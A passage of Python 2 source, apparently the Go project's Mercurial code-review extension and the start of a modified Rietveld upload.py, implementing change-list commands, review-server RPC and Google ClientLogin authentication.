cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
data = RunShell(cmd, silent_ok=True)
deltas = []
for line in data.splitlines():
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
continue
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
deltas.append((n1, len1, n2+len2-(n1+len1)))
return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
d = 0
for (old, oldlen, newdelta) in deltas:
if old >= n+len:
break
if old+len > n:
return 0, "patch and recent changes conflict"
d = newdelta
return d, ""
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
if missing_codereview:
return missing_codereview
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
if missing_codereview:
return missing_codereview
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats, opts)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
if missing_codereview:
return missing_codereview
files = ChangedExistingFiles(ui, repo, pats, opts)
files = [f for f in files if f.endswith(".go")]
if not files:
return "no modified go files"
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
raise util.Abort("gofmt did not exit cleanly")
except error.Abort, e:
raise
except:
raise util.Abort("gofmt: " + ExceptionDetail())
return
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
if missing_codereview:
return missing_codereview
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
# If no reviewer is listed, assign the review to defaultcc.
# This makes sure that it appears in the
# codereview.appspot.com/user/defaultcc
# page, so that it doesn't get dropped on the floor.
if not defaultcc:
return "no reviewers listed in CL"
cl.cc = Sub(cl.cc, defaultcc)
cl.reviewer = defaultcc
cl.Flush(ui, repo)
if cl.files == []:
return "no changed files, not sending mail"
cl.Mail(ui, repo)
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
if missing_codereview:
return missing_codereview
m = LoadAllCL(ui, repo, web=True)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
ui.write(cl.PendingText() + "\n")
files = DefaultFiles(ui, repo, [], opts)
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
def reposetup(ui, repo):
global original_match
if original_match is None:
start_status_thread()
original_match = scmutil.match
scmutil.match = ReplacementForCmdutilMatch
RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
set_status("checking CONTRIBUTORS file")
user, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user=None, warn=True):
if not user:
user = ui.config("ui", "username")
if not user:
raise util.Abort("[ui] username is not configured in .hgrc")
user = user.lower()
m = re.match(r".*<(.*)>", user)
if m:
user = m.group(1)
if user not in contributors:
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return user, None
user, email = contributors[user]
return email, "%s <%s>" % (user, email)
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
if missing_codereview:
return missing_codereview
# We already called this on startup but sometimes Mercurial forgets.
set_mercurial_encoding_to_utf8()
repo.ui.quiet = True
if not opts["no_incoming"] and Incoming(ui, repo, opts):
return "local repository out of date; must sync before submit"
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
user = None
if cl.copied_from:
user = cl.copied_from
userline = CheckContributor(ui, repo, user)
typecheck(userline, str)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
return "no reviewers listed in CL"
if not cl.local:
return "cannot submit non-local CL"
# upload, to sync current patch and also get change number if CL is new.
if not cl.copied_from:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckFormat(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.copied_from:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
typecheck(about, str)
if not cl.mailed and not cl.copied_from: # in case this is TBR
cl.Mail(ui, repo)
# submit changes locally
date = opts.get('date')
if date:
opts['date'] = util.parsedate(date)
typecheck(opts['date'], str)
opts['message'] = cl.desc.rstrip() + "\n\n" + about
typecheck(opts['message'], str)
if opts['dryrun']:
print "NOT SUBMITTING:"
print "User: ", userline
print "Message:"
print Indent(opts['message'], "\t")
print "Files:"
print Indent('\n'.join(cl.files), "\t")
return "dry run; not submitted"
m = match.exact(repo.root, repo.getcwd(), cl.files)
node = repo.commit(ustr(opts['message']), ustr(userline), opts.get('date'), m)
if not node:
return "nothing changed"
# push to remote; if it fails for any reason, roll back
try:
log = repo.changelog
rev = log.rev(node)
parents = log.parentrevs(rev)
if (rev-1 not in parents and
(parents == (nullrev, nullrev) or
len(log.heads(log.node(parents[0]))) > 1 and
(parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
# created new head
raise util.Abort("local repository out of date; must sync before submit")
# push changes to remote.
# if it works, we're committed.
# if not, roll back
other = getremote(ui, repo, opts)
r = repo.push(other, False, None)
if r == 0:
raise util.Abort("local repository out of date; must sync before submit")
except:
real_rollback()
raise
# we're committed. upload final patch, close review, add commit message
changeURL = short(node)
url = other.url()
m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
if m:
changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
# When posting, move reviewers to CC line,
# so that the issue stops showing up in their "My Issues" page.
PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
c = repo[None]
if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
ui.write("switching from %s to default branch.\n" % releaseBranch)
err = hg.clean(repo, "default")
if err:
return err
return None
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if missing_codereview:
return missing_codereview
if not opts["local"]:
ui.status = sync_note
ui.note = sync_note
other = getremote(ui, repo, opts)
modheads = repo.pull(other)
err = commands.postincoming(ui, repo, modheads, True, "tip")
if err:
return err
commands.update(ui, repo, rev="default")
sync_changes(ui, repo)
def sync_note(msg):
# we run sync (pull -u) in verbose mode to get the
# list of files being updated, but that drags along
# a bunch of messages we don't care about.
# omit them.
if msg == 'resolving manifests\n':
return
if msg == 'searching for changes\n':
return
if msg == "couldn't find merge tool hgmerge\n":
return
sys.stdout.write(msg)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
def Rev(rev):
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
if hgversion < '1.4':
get = util.cachefunc(lambda r: repo[r].changeset())
changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
n = 0
for st, rev, fns in changeiter:
if st != 'iter':
continue
n += 1
if n > 100:
break
Rev(rev)
else:
matchfn = scmutil.match(repo, [], {'rev': None})
def prep(ctx, fns):
pass
for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
Rev(ctx.rev())
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [], {})
for _, cl in all.items():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
if not cl.copied_from:
ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
else:
ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
return
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if missing_codereview:
return missing_codereview
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
return err
if not cl.local:
return "cannot upload non-local change"
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
('p', 'pending', None, 'print pending summary to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^release-apply": (
release_apply,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# TODO: release-start, release-tag, weekly-tag
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
('n', 'dryrun', None, 'make change only locally (for testing)'),
] + commands.walkopts + commands.commitopts + commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^undo": (
undo,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
def JSONGet(ui, path):
try:
data = MySend(path, force_auth=False)
typecheck(data, str)
d = fix_json(json.loads(data))
except:
ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
return None
return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
if type(x) in [str, int, float, bool, type(None)]:
pass
elif type(x) is unicode:
x = x.encode("utf-8")
elif type(x) is list:
for i in range(len(x)):
x[i] = fix_json(x[i])
elif type(x) is dict:
todel = []
for k in x:
if x[k] is None:
todel.append(k)
else:
x[k] = fix_json(x[k])
for k in todel:
del x[k]
else:
raise util.Abort("unknown type " + str(type(x)) + " in fix_json")
if type(x) is str:
x = x.replace('\r\n', '\n')
return x
def IsRietveldSubmitted(ui, clname, hex):
dict = JSONGet(ui, "/api/" + clname + "?messages=true")
if dict is None:
return False
for msg in dict.get("messages", []):
text = msg.get("text", "")
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def IsRietveldMailed(cl):
for msg in cl.dict.get("messages", []):
if msg.get("text", "").find("I'd like you to review this change") >= 0:
return True
return False
def DownloadCL(ui, repo, clname):
set_status("downloading CL " + clname)
cl, err = LoadCL(ui, repo, clname, web=True)
if err != "":
return None, None, None, "error loading CL %s: %s" % (clname, err)
# Find most recent diff
diffs = cl.dict.get("patchsets", [])
if not diffs:
return None, None, None, "CL has no patch sets"
patchid = diffs[-1]
patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
if patchset is None:
return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
if patchset.get("patchset", 0) != patchid:
return None, None, None, "malformed patchset information"
vers = ""
msg = patchset.get("message", "").split()
if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
vers = msg[2]
diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
diffdata = MySend(diff, force_auth=False)
# Print warning if email is not in CONTRIBUTORS file.
email = cl.dict.get("owner_email", "")
if not email:
return None, None, None, "cannot find owner for %s" % (clname)
him = FindContributor(ui, repo, email)
me = FindContributor(ui, repo, None)
if him == me:
cl.mailed = IsRietveldMailed(cl)
else:
cl.copied_from = email
return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Run MySend1 maybe twice, because Rietveld is unreliable."""
try:
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
except Exception, e:
if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
raise
print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
time.sleep(2)
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
# Translate \r\n into \n, because Rietveld doesn't.
response = response.replace('\r\n', '\n')
# who knows what urllib will give us
if type(response) == unicode:
response = response.encode("utf-8")
typecheck(response, str)
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(ustr(MySend(url))) # f.feed wants unicode
f.close()
# convert back to utf-8 to restore sanity
m = {}
for k,v in f.map.items():
m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
set_status("uploading change to description")
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed:
form_fields['closed'] = "checked"
if private:
form_fields['private'] = "checked"
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
pass
def nocommit(*pats, **opts):
"""(disabled when using this extension)"""
raise util.Abort("codereview extension enabled; use mail, upload, or submit instead of commit")
def nobackout(*pats, **opts):
"""(disabled when using this extension)"""
raise util.Abort("codereview extension enabled; use undo instead of backout")
def norollback(*pats, **opts):
"""(disabled when using this extension)"""
raise util.Abort("codereview extension enabled; use undo instead of rollback")
def RietveldSetup(ui, repo):
global defaultcc, upload_options, rpc, server, server_url_base, force_google_account, verbosity, contributors
global missing_codereview
repo_config_path = ''
# Read repository-specific options from lib/codereview/codereview.cfg
try:
repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
f = open(repo_config_path)
for line in f:
if line.startswith('defaultcc: '):
defaultcc = SplitCommaSpace(line[10:])
except:
# If there are no options, chances are good this is not
# a code review repository; stop now before we foul
# things up even worse. Might also be that repo doesn't
# even have a root. See issue 959.
if repo_config_path == '':
missing_codereview = 'codereview disabled: repository has no root'
else:
missing_codereview = 'codereview disabled: cannot open ' + repo_config_path
return
# Should only modify repository with hg submit.
# Disable the built-in Mercurial commands that might
# trip things up.
cmdutil.commit = nocommit
global real_rollback
real_rollback = repo.rollback
repo.rollback = norollback
# would install nobackout if we could; oh well
try:
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
for line in f:
# CONTRIBUTORS is a list of lines like:
# Person <email>
# Person <email> <alt-email>
# The first email address is the one used in commit logs.
if line.startswith('#'):
continue
m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
if m:
name = m.group(1)
email = m.group(2)[1:-1]
contributors[email.lower()] = (name, email)
for extra in m.group(3).split():
contributors[extra[1:-1].lower()] = (name, email)
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
server_url_base = "http://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = None
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
global releaseBranch
tags = repo.branchtags().keys()
if 'release-branch.r100' in tags:
# NOTE(rsc): This tags.sort is going to get the wrong
# answer when comparing release-branch.r99 with
# release-branch.r100. If we do ten releases a year
# that gives us 4 years before we have to worry about this.
raise util.Abort('tags.sort needs to be fixed for release-branch.r100')
tags.sort()
for t in tags:
if t.startswith('release-branch.'):
releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
'application/javascript',
'application/x-javascript',
'application/x-freemind'
]
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
